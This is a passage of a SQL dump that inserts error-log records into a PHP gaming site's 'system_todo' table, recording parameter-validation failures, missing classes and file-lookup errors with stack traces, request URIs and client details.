'2014-11-21 13:53:38', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=defias', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (242, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=2', 'cf6962b43f0243ec46ee75351799cab15de9e09d', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '93.204.81.49', 0.016, '2014-11-21 13:53:27', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=2', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (243, 'ERROR', 'You need to be logged in to view this ressource.', 'ce1bcbc4e2e244f775aa9a8fc9de471d0b058843', 1, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 79, '#0 [internal function]: page_mojotrollz::page_user_achievements_menu_sub(\'1\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'page_mojotrollz\', Array, 1, false, true)\n#3 {main}', '93.204.81.49', 0.064, '2014-11-23 00:00:39', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements_menu_sub&menu=1&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (244, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 2; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=creature&entry=69', '67693cbc603ce02c60d8e8685101d5ba4a60e825', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.096, '2014-11-24 14:35:31', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=creature&entry=69', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (245, 'SYSTEM\\LOG\\ERROR', 'Parameter missing: Entry', 'feb0e6108e7ec7177328f0f775d585caf3507d25', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 151, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 10, \'creature\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.012, '2014-11-24 14:43:23', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=creature&entry=69', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (246, 'ERROR', 'Could not insert icon.', 'eefb836da2ba0166c2da92a0ba60c4dae3af453a', 1, '/home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_skilltree/saimod_mojotrollz_skilltree.php', 30, '#0 [internal function]: saimod_mojotrollz_skilltree::sai_mod_saimod_mojotrollz_skilltree_action_icon_insert(\'1\', \'1\', \'2\', \'1\', \'talent_icon\', \'\', \'\', \'2\', \'0\', \'0\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.112, '2014-11-24 22:06:10', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=icon_insert&class=1&tree=1&row=2&column=1&type=talent_icon&border=&icon=&max=2&parent_row=0&parent_column=0', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4', 13, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (247, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: tree Verifier: UINT', '3f31a3485f852a254fc3f187574852412b47d143', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 5100, \'icon_insert\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.08, '2014-11-27 12:51:13', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=icon_insert&class=2&tree=&row=&column=&type=&border=&icon=&max=&parent_row=&parent_column=', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?t=1_053253200000000000__', 'Mozilla/5.0 (iPad; CPU OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4', 13, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (249, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: row Verifier: UINT', 'c17728dd98c7146206692449514ff9f6c005423b', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 5100, \'icon_insert\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.016, '2014-12-13 22:13:39', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=icon_insert&class=3&tree=3&row=&column=&type=&border=&icon=&max=&parent_row=&parent_column=', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?t=11_0000000000000000_5500511303222151_000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36', 10, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (430, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=1', '32c4d394a7d969204ff74bc36255852611d024ef', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.012, '2014-12-11 01:55:37', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (250, 'ERROR', 'Could not insert icon.', 'eefb836da2ba0166c2da92a0ba60c4dae3af453a', 1, '/home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_skilltree/saimod_mojotrollz_skilltree.php', 34, '#0 [internal function]: saimod_mojotrollz_skilltree::sai_mod_saimod_mojotrollz_skilltree_action_icon_insert(\'5\', \'1\', \'1\', \'2\', \'talent_icon\', \'icon_border_gre...\', \'\', \'5\', \'\', \'\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.02, '2014-12-14 00:41:21', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=icon_insert&class=5&tree=1&row=1&column=2&type=talent_icon&border=icon_border_green&icon=&max=5&parent_row=&parent_column=', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (251, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_top_l.png/\' found.', '3a290d8699f3e56684e57236cb899a99541d4f46', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'border_top_l.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'border_top_l.pn...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '8.28.16.254', 0.116, '2014-11-26 23:38:58', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=default_page&id=border_top_l.png/', 'a:0:{}', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (252, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_top_r.png/\' found.', 'd4c2e356ba0b4bcba7a39aeb58bc99d18b658efd', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'border_top_r.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'border_top_r.pn...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '8.28.16.254', 0.12, '2014-11-26 23:38:58', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=default_page&id=border_top_r.png/', 'a:0:{}', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (253, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'background.png/\' found.', '51592911568fbae490234b3eaea501456ba57a33', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'background.png/\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'background.png/\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '8.28.16.254', 0.124, '2014-11-26 23:38:58', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=default_page&id=background.png/', 'a:0:{}', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (254, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_top_m.png/\' found.', '1c776b974203700c7b989ae14272dbee802115a2', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'border_top_m.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'border_top_m.pn...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '8.28.16.254', 0.076, '2014-11-26 23:38:58', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=default_page&id=border_top_m.png/', 'a:0:{}', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (255, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'wall.png/\' found.', '6cebbb4d3f8ec62774a55b219ab84b7a882f0b7e', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'wall.png/\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'wall.png/\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '8.28.16.254', 0.012, '2014-11-26 23:39:01', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=default_page&id=wall.png/', 'a:0:{}', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (256, 'SYSTEM\\LOG\\ERROR', 'Parameter missing: entry', 'cb8593558d57e1109f7c8c6fc2ada5fa3aa9eaa3', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 151, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 10, \'creature\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.240', 0.004, '2014-11-26 23:49:35', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=creature', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 40, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (257, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: entry Verifier: INT', 'ba9e8004abbc98fac86ad71ba75c91865113de7b', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 10, \'quest\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.240', 0.012, '2014-11-29 01:09:15', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=quest&entry=${Entry}', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (258, 'SYSTEM\\LOG\\ERROR', 'Class not found: WOW_STATS_REALM_ONLINE', '9d696e85aa331ff6b80413b481731de55500e1e7', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'WOW_STATS_REALM...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/api/realm/realm.php(5): spl_autoload_call(\'WOW_STATS_REALM...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/default_start/default_start.php(17): realm::status()\n#3 /home/web/webdir/mojotrollz/index.php(12): default_start->html()\n#4 {main}', '37.24.148.240', 0.084, '2014-11-27 13:06:47', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=default_start&', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (259, 'SYSTEM\\LOG\\ERROR', 'Class not found: creature', 'f86fc9046a88399f5bce830ddf9ff9c8862c9905', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'creature\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/user_start/user_start.php(55): spl_autoload_call(\'creature\')\n#2 /home/web/webdir/mojotrollz/index.php(12): user_start->html()\n#3 {main}', '37.24.148.240', 0.38801, '2014-11-28 16:51:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_start&', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (260, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Table \'host_mojotrollz.system_cron\' doesn\'t exist', 'deac57b2063d5319e5ab45a6c2722b16bf1841ee', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(41): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM s...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM s...\')\n#2 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_cron/saimod_sys_cron.php(8): SYSTEM\\DB\\QQ::QQ()\n#3 [internal function]: SYSTEM\\SAI\\saimod_sys_cron::sai_mod__SYSTEM_SAI_saimod_sys_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'\\\\SYSTEEM\\\\SAI\\\\sssai.\',Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.240', 0.108, '2014-11-27 13:33:23', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cron', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?t=2_50500122511351_000000000000000_000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (261, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: min Verifier: INT', '4aafd85648d2d78f2afd2744a086a0142b12dec9', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 1200, \'add\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'\\\\SYSTEEM\\\\SAI\\\\sssai.\',Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.024, '2014-12-23 08:03:27', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?&sai_mod=.SYSTEM.SAI.saimod_sys_cron&action=add&cls=%5CSYSTEM%5CCRON%5Ccron_log2sqlite&min=&hour=&day=&day_week=&month=', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?t=2_50500122511351_000000000000000_000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, 